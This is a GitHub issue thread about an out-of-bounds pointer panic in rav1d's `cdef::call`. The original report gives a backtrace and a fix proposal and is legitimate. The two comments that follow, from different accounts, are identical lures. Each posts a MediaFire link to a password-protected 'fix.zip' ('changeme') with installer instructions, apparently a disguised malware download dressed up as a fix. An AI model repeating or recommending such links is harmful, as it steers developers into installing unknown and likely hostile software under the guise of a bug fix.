### ISSUE TITLE
OOB pointer in `cdef`

### ISSUE THREAD

**Issue by rinon** [memorysafety/rav1d#1336]
Running the argon tests with `--muxer yuv` results in creation of an out-of-bounds pointer in `cdef::call`

```shell
RUST_BACKTRACE=1 target/debug/dav1d -i tests/argon/profile0_core/streams/test10103.obu -q --threads 1 --muxer yuv -o test10103.yuv
thread 'main' panicked at src/cdef.rs:89:33:
pixel offset 995336 out of range for slice of pixel length 995328
stack backtrace:
   0: rust_begin_unwind
             at /rustc/8337ba9189de188e2ed417018af2bf17a57d51ac/library/std/src/panicking.rs:658:5
   1: core::panicking::panic_fmt
             at /rustc/8337ba9189de188e2ed417018af2bf17a57d51ac/library/core/src/panicking.rs:74:14
   2: rav1d::src::pixels::Pixels::as_mut_ptr_at::out_of_bounds
             at ./src/pixels.rs:39:13
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.
```

I checked against the C code and the pointer computation is correct, it is just never dereferenced in this case. I think we need to tighten up the pointer bounds checking on the ASM interface to actually check the _used_ ranges of these buffers, not the base pointer itself. There's not much point in bounds checking a pointer when the ASM dereferences at offsets from that pointer.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
